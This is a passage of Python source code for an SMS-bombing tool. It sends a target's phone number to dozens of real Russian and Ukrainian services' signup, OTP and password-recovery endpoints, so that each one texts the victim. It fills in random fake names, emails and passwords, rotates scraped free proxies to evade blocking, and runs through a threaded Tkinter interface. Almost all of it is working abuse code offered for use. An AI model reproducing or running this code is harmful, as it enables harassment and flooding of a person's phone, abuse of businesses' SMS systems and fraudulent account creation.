requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone})
good()
except Exception as e:
error()
try:
requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main¤tLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'})
good()
except Exception as e:
error()
try:
requests.post('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11])
good()
except Exception as e:
error()
try:
requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]})
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email})
good()
except Exception as e:
error()
try:
requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'})
good()
except Exception as e:
error()
try:
requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'})
good()
except Exception as e:
error()
try:
requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'})
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone})
good()
except Exception as e:
error()
try:
requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone})
good()
except Exception as e:
error()
try:
requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone})
good()
except Exception as e:
error()
try:
a = requests.get('https://driver.gett.ru/signup/')
requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']})
good()
except Exception as e:
error()
try:
requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'})
good()
except Exception as e:
error()
try:
b = requests.session()
b.get('https://drugvokrug.ru/siteActions/processSms.htm')
requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'})
good()
except Exception as e:
error()
try:
rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]})
good()
except Exception as e:
error()
try:
rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone})
good()
except Exception as e:
error()
try:
psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'})
good()
except Exception as e:
error()
try:
beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone})
good()
except Exception as e:
error()
try:
modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'})
good()
except Exception as e:
error()
try:
data = {'form[NAME]':'Иван',
'form[PERSONAL_GENDER]':'M',
'form[PERSONAL_BIRTHDAY]':'11.02.2000',
'form[EMAIL]':'fbhbdfvbd@gmail.com',
'form[LOGIN]':phone1,
'form[PASSWORD]':None,
'get-new-password':'Получите пароль по SMS',
'user_agreement':'on',
'personal_data_agreement':'on',
'formType':'full',
'utc_offset':180}
aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data)
good()
except Exception as e:
error()
try:
tvzavr = requests.post('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49')
good()
except Exception as e:
error()
try:
cook = requests.post('https://www.netprint.ru/order/profile')
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate, br',
'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
'Connection':'keep-alive',
'Content-Length':145,
'Cookie':'unbi=' + cook.cookies['unbi'],
'Host':'www.netprint.ru',
'Origin':'https://www.netprint.ru',
'Referer':'https://www.netprint.ru/order/profile',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48',
'X-Requested-With':'XMLHttpRequest'}
netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1})
good()
except Exception as e:
error()
try:
requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7})
good()
except Exception as e:
error()
try:
requests.get('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en')
good()
except Exception as e:
error()
try:
requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone',
'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'})
good()
except Exception as e:
error()
try:
requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone,
'SignupForm[device_type]':3})
good()
except Exception as e:
error()
try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone,
'locale':'en', 'countryCode':'ru', 'version':'1',
'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'})
good()
except Exception as e:
error()
try:
requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request',
'phone':'+' + phone, 'phone_permission':'unknown',
'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown',
'devicemodel':'unknown'})
good()
except Exception as e:
error()
try:
password = ''.join(random.choice(string.ascii_letters) for _ in range(6))
requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone})
good()
except Exception as e:
error()
try:
requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone})
good()
except Exception as e:
error()
try:
requests.get('https://findclone.ru/register?phone=+' + phone)
good()
except Exception as e:
error()
try:
requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={})
good()
except Exception as e:
error()
try:
requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={})
good()
except Exception as e:
error()
try:
requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={})
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'})
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}})
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone})
good()
except Exception as e:
error()
try:
requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''})
good()
except Exception as e:
error()
try:
requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone})
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email})
good()
except Exception as e:
error()
def spamProxy(phone):
while True:
def proxy():
with open(file_name) as file:
list_proxy = file.read().split('\n')
random_proxy_count = randint(0, len(list_proxy) - 1)
try:
proxies = {'http': list_proxy[random_proxy_count].split(' ')[1]}
return proxies
except:
proxies = {'http': list_proxy[(random_proxy_count - 1)].split(' ')[1]}
return proxies
_name = ''
for x in range(12):
_name = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
password = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
username = _name + random.choice(list('123456789qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
_email = _name + '@gmail.com'
email = _name + '@gmail.com'
_phone = phone
_phone9 = _phone[1:]
_phoneAresBank = '+' + _phone[0] + '(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phone9dostavista = _phone9[:3] + '+' + _phone9[3:6] + '-' + _phone9[6:8] + '-' + _phone9[8:10]
_phoneOstin = '+' + _phone[0] + '+(' + _phone[1:4] + ')' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_phonePizzahut = '+' + _phone[0] + ' (' + _phone[1:4] + ') ' + _phone[4:7] + ' ' + _phone[7:9] + ' ' + _phone[9:11]
_phoneGorzdrav = _phone[1:4] + ') ' + _phone[4:7] + '-' + _phone[7:9] + '-' + _phone[9:11]
_text = 'Ляля'
phone1 = '+' + phone[0] + ' ' + '(' + phone[1] + phone[2] + phone[3] + ')' + ' ' + phone[4] + phone[5] + phone[6] + '-' + phone[7] + phone[8] + '-' + phone[9] + phone[10]
phone2 = phone[1] + phone[2] + phone[3] + phone[4] + phone[5] + phone[6] + phone[7] + phone[8] + phone[9] + phone[10]
try:
requests.post('https://app.karusel.ru/api/v1/phone/', data={'phone': _phone}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://oauth.sovest.ru/oauth/authorize', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://gorzdrav.org/login/register/sms/send', data={'phone': _phone9}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://www.sportmaster.ru/user/session/sendSmsCode.do?phone=+' + _phone + '&_=1580559110407'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ctx.playfamily.ru/screenapi/v3/sendsmscode/web/1', data={'phone':_phone, 'password':password}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://my.pozvonim.com/api/v1/auth/send/sms', data={'phone':_phone, 'origin':'https://my.pozvonim.com', 'referer':'https://my.pozvonim.com/register/', 'host':'my.pozvonim.com'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper?oper=9&callmode=1&phone=' + _phone), data={'host':'register.sipnet.ru', 'origin':'https://www.sipnet.ru', 'referer':'https://www.sipnet.ru/register'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', data={'phoneNumber':_phone, 'countryCode':'ID', 'name':'test', 'email':'mail@mail.com', 'deviceToken':'*'}, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://youla.ru/web-api/auth/request_code', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_name, 'phone':_phone, 'promo':'yellowforma'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCodeForOtp', params={'pageName':'loginByUserPhoneVerification', 'fromCheckout':'false', 'fromRegisterPage':'true', 'snLogin':'', 'bpg':'', 'snProviderId':''}, data={'phone':'+7 915 3509908', 'g-recaptcha-response':'', 'recaptcha':'on'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://newnext.ru/graphql', json={'operationName':'registration', 'variables':{'client': {'firstName':'Иван', 'lastName':'Иванов', 'phone':_phone, 'typeKeys':['Unemployed']}}, 'query':'mutation registration($client: ClientInput!) {\n registration(client: $client) {\n token\n __typename\n }\n}\n'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.sunlight.net/v3/customers/authorization/', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://alpari.com/api/ru/protection/deliver/2f178b17990ca4b7903aa834b9f54c2c0bcb01a2/', json={'client_type':'personal', 'email':_email, 'mobile_phone':_phone, 'deliveryOption':'sms'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://online.sbis.ru/reg/service/', json={'jsonrpc':'2.0', 'protocol':'5', 'method':'Пользователь.ЗаявкаНаФизика', 'params':{'phone': _phone}, 'id':'1'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms', json={'phone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://lenta.com/api/v1/authentication/requestValidationCode', json={'phone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://cloud.mail.ru/api/v2/notify/applink', json={'phone':'+' + _phone, 'api':2, 'email':'email', 'x-email':'x-email'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone', data={'st.r.phone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://plink.tech/register/', json={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('http://smsgorod.ru/sendsms.php', data={'number': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday':{'day':15, 'month':12, 'year':1997}, 'client_id':'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code':True, 'password':password, 'phone_number':_phone, 'username':username}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={'msisdn': _phone}, headers={'App-ID': 'cabinet'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://eda.yandex/api/v1/user/request_authentication_code', json={'phone_number': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api-prime.anytime.global/api/v2/auth/sendVerificationCode', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.delivery-club.ru/ajax/user_otp', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-phone/validate', json={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://youdo.com/api/verification/sendverificationcode/', data={'PhoneE164': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post(('https://www.citilink.ru/registration/confirm/phone/+' + _phone + '/'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://tehnosvit.ua/iwantring_feedback.html', data={'feedbackName':_name, 'feedbackPhone':'+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://mobileplanet.ua/register', data={'klient_name':_name, 'klient_phone':'+' + _phone, 'klient_email':_email}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://protovar.com.ua/aj_record', data={'object':'callback', 'user_name':_name, 'contact_phone':_phone[3:]}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://e-vse.online/mail2.php', data={'telephone': '+' + _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main¤tLocale=uk_UA', data={'firstname':_name, 'telephone':_phone[2:], 'email':_email, 'password':password, 'form_key':'Zqqj7CyjkKG2ImM8'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post(('https://secure.online.ua/ajax/check_phone/?reg_phone=%2B' + _phone[0:7] + '-' + _phone[8:11]), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://707taxi.com.ua/sendSMS.php', data={'tel': _phone[3:]}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post(f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone={_phone}", data={'result': 'ok'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://my.citrus.ua/api/v2/register', data={'email':_email, 'name':_name, 'phone':_phone[2:], 'password':'fgfg', 'confirm_password':'fgfg'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.nl.ua', data={'component':'bxmaker.authuserphone.login', 'sessid':'bf70db951f54b837748f69b75a61deb4', 'method':'sendCode', 'phone':_phone, 'registration':'N'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru', data={'phone_number': phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.tinkoff.ru/v1/sign_up', data={'phone': '+' + phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.mtstv.ru/v1/users', data={'msisdn': phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
a = requests.get('https://driver.gett.ru/signup/', proxies=(proxy()))
requests.post('https://driver.gett.ru/api/login/phone/', data={'phone':phone, 'registration':'true'}, headers={'Accept-Encoding':'gzip, deflate, br', 'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'csrftoken=' + a.cookies['csrftoken'] + '; _ym_uid=1547234164718090157; _ym_d=1547234164; _ga=GA1.2.2109386105.1547234165; _ym_visorc_46241784=w; _gid=GA1.2.1423572947.1548099517; _gat_gtag_UA_107450310_1=1; _ym_isad=2', 'Host':'driver.gett.ru', 'Referer':'https://driver.gett.ru/signup/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-CSRFToken':a.cookies['csrftoken']}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.ivi.ru/mobileapi/user/register/phone/v6/', data={'phone': phone}, headers={'Accept-Language':'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'Connection':'keep-alive', 'Host':'api.ivi.ru', 'origin':'https://www.ivi.ru/', 'Referer':'https://www.ivi.ru/profile'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
b = requests.session()
b.get('https://drugvokrug.ru/siteActions/processSms.htm', proxies=(proxy()))
requests.post('https://drugvokrug.ru/siteActions/processSms.htm', data={'cell': phone}, headers={'Accept-Language':'en-US,en;q=0.5', 'Connection':'keep-alive', 'Cookie':'JSESSIONID=' + b.cookies['JSESSIONID'] + ';', 'Host':'drugvokrug.ru', 'Referer':'https://drugvokrug.ru/', 'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'X-Requested-With':'XMLHttpRequest'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
rutaxi = requests.post('https://moscow.rutaxi.ru/ajax_keycode.html', data={'l': phone[1:]}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
rutube = requests.post('https://rutube.ru/api/accounts/sendpass/phone', data={'phone': '+' + phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
psbank = requests.post('https://ib.psbank.ru/api/authentication/extendedClientAuthRequest', json={'firstName':'Иван', 'middleName':'Иванович', 'lastName':'Иванов', 'sex':'1', 'birthDate':'10.10.2000', 'mobilePhone':phone[1:], 'russianFederationResident':'true', 'isDSA':'false', 'personalDataProcessingAgreement':'true', 'bKIRequestAgreement':'null', 'promotionAgreement':'true'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
beltelecom = requests.post('https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru', data={'phone': phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
modulbank = requests.post('https://my.modulbank.ru/api/v2/registration/nameAndPhone', json={'FirstName':'Саша', 'CellPhone':phone[1:], 'Package':'optimal'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
data = {'form[NAME]':'Иван',
'form[PERSONAL_GENDER]':'M',
'form[PERSONAL_BIRTHDAY]':'11.02.2000',
'form[EMAIL]':'fbhbdfvbd@gmail.com',
'form[LOGIN]':phone1,
'form[PASSWORD]':None,
'get-new-password':'Получите пароль по SMS',
'user_agreement':'on',
'personal_data_agreement':'on',
'formType':'full',
'utc_offset':180}
aptkru = requests.post('https://apteka.ru/_action/auth/getForm/', data=data, proxies=(proxy()))
good()
except Exception as e:
error()
try:
tvzavr = requests.post(('https://www.tvzavr.ru/api/3.1/sms/send_confirm_code?plf=tvz&phone=' + phone + '&csrf_value=a222ba2a464543f5ac6ad097b1e92a49'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
cook = requests.post('https://www.netprint.ru/order/profile', proxies=(proxy()))
headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
'Accept-Encoding':'gzip, deflate, br',
'Accept-Language':'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7',
'Connection':'keep-alive',
'Content-Length':145,
'Cookie':'unbi=' + cook.cookies['unbi'],
'Host':'www.netprint.ru',
'Origin':'https://www.netprint.ru',
'Referer':'https://www.netprint.ru/order/profile',
'Sec-Fetch-Mode':'cors',
'Sec-Fetch-Site':'same-origin',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36 OPR/65.0.3467.48',
'X-Requested-With':'XMLHttpRequest'}
netprint = requests.post('https://www.netprint.ru/order/social-auth', headers=headers, data={'operation':'stdreg', 'email_or_phone':phonew, 'i_agree_with_terms':1}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('http://youdrive.today/login/web/phone', data={'phone':phone, 'phone_code':7}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://www.oyorooms.com/api/pwa/generateotp?phone=' + phone + '&country_code=%2B7&nod=4&locale=en'), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.carsmile.com/', json={'operationName':'enterPhone',
'variables':{'phone': phone}, 'query':'mutation enterPhone($phone: String!) {\n enterPhone(phone: $phone)\n}\n'},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://api.delitime.ru/api/v2/signup', data={'SignupForm[username]':phone,
'SignupForm[device_type]':3},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.icq.com/smsreg/requestPhoneValidation.php', data={'msisdn':phone,
'locale':'en', 'countryCode':'ru', 'version':'1',
'k':'ic1rtwz1s1Hj1O0r', 'r':'46763'},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://terra-1.indriverapp.com/api/authorization?locale=ru', data={'mode':'request',
'phone':'+' + phone, 'phone_permission':'unknown',
'stream_id':0, 'v':3, 'appversion':'3.20.6', 'osversion':'unknown',
'devicemodel':'unknown'},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
password = ''.join(random.choice(string.ascii_letters) for _ in range(6))
requests.post('https://lk.invitro.ru/sp/mobileApi/createUserByPassword', data={'password':password, 'application':'lkp', 'login':'+' + phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://qlean.ru/clients-api/v2/sms_codes/auth/request_code', json={'phone': phone},
proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.get(('https://findclone.ru/register?phone=+' + phone), proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://mobile.vkusvill.ru:40113/api/user/', data={'Phone_number':_phone9, 'version':'2'}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('http://taxiseven.ru/auth/register', data={'phone': _phone}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://security.wildberries.ru/mobile/requestconfirmcode?forAction=RegisterUser', data={'phone': '+' + _phone}, headers={}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.rabota.ru/remind', data={'credential': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://fastmoney.ru/auth/registration', data={'RegistrationForm[username]':'+' + _phone, 'RegistrationForm[password]':'12345', 'RegistrationForm[confirmPassword]':'12345', 'yt0':'Регистрация'}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://ube.pmsm.org.ru/esb/iqos-reg/submission', json={'data': {'firstName':_text, 'lastName':'***', 'phone':_phone, 'email':_name + '@gmail.com', 'password':_name, 'passwordConfirm':_name}}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php', data={'name':_text, 'phone':_phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://login.mos.ru/sps/recovery/start', json={'login':_phone, 'attr':''}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://lk.invitro.ru/lk2/lka/patient/refreshCode', data={'phone': _phone}, proxies=(proxy()))
good()
except Exception as e:
error()
try:
requests.post('https://comfy.ua/ua/customer/account/createPost', data={'registration_name':_name, 'registration_phone':_phone[2:], 'registration_email':_email}, proxies=(proxy()))
good()
except Exception as e:
error()
class Queue:
def __init__(self):
self.queue = []
def get(self):
if self.qsize() != 0:
return self.queue.pop()
def put(self, item):
if item not in self.queue:
self.queue.append(item)
def qsize(self):
return len(self.queue)
def __str__(self):
return str(self.queue)
class Proxy:
def __init__(self):
self.anony_proxis = 'https://free-proxy-list.net/anonymous-proxy.html'
self.new_proxies = 'https://free-proxy-list.net'
self.socks_proxies = 'https://socks-proxy.net'
self.ssl_proxies = 'https://sslproxies.org'
self.qproxy = None
self.psize = 0
self.country = None
self.port = None
def fetch(self, url):
proxies = bs(get(url).text, 'html.parser').find('tbody').findAll('tr')
for proxy in proxies:
pjson = self.parse(proxy.findAll('td'))
if pjson:
if self.psize:
if self.qproxy.qsize() < self.psize:
self.qproxy.put(pjson)
else:
break
else:
self.qproxy.put(pjson)
def parse(self, proxy):
pjson = {'ip':proxy[0].string,
'port':proxy[1].string, 'anonymity':proxy[4].string,
'country':proxy[3].string,
'updated':proxy[7].string,
'https':proxy[6].string}
if all([self.country, self.port]):
if pjson['country'] == self.country:
if pjson['port'] == self.port:
return pjson
elif self.port:
if self.port != pjson['port']:
return
return pjson
elif self.country:
if self.country != pjson['country']:
return
return pjson
else:
return pjson
def scrape(self, size=None, port=None, country=None, new_proxies=False, anony_proxies=False, socks_proxies=False, ssl_proxies=False):
self.port = str(port) if port else None
self.country = country
self.qproxy = Queue()
self.psize = size
if new_proxies:
self.fetch(self.new_proxies)
if anony_proxies:
self.fetch(self.anony_proxies)
if socks_proxies:
self.fetch(self.socks_proxies)
if ssl_proxies:
self.fetch(self.ssl_proxies)
proxies = self.qproxy
self.qproxy = Queue()
return proxies
def download():
prx = Proxy()
proxies = prx.scrape(new_proxies=True, size=10)
f = open('proxy.txt', 'w')
while 1:
if proxies.qsize():
proxy = proxies.get()
f.write('http socks5://' + proxy['ip'] + ':' + proxy['port'] + '\n')
f.close()
messagebox.showinfo(title='Proxy загружены', message=('Путь к файлу: ' + os.path.dirname(os.path.abspath(__file__)) + '\\proxy.txt'))
var = IntVar()
check = Checkbutton(root, text='Использовать PROXY', variable=var, onvalue=1, offvalue=0)
check.pack()
check.place(x=350, y=50)
def StartThread():
number = text1.get('1.0', 'end')
try:
thrade = int(text2.get('1.0', 'end'))
except:
messagebox.showinfo(title='Warning', message='Не корректный формат потоков')
try:
if thrade > 20:
messagebox.showinfo(title='Warning', message='Слишком большое количество потоков')
except:
pass
if var.get() == 1:
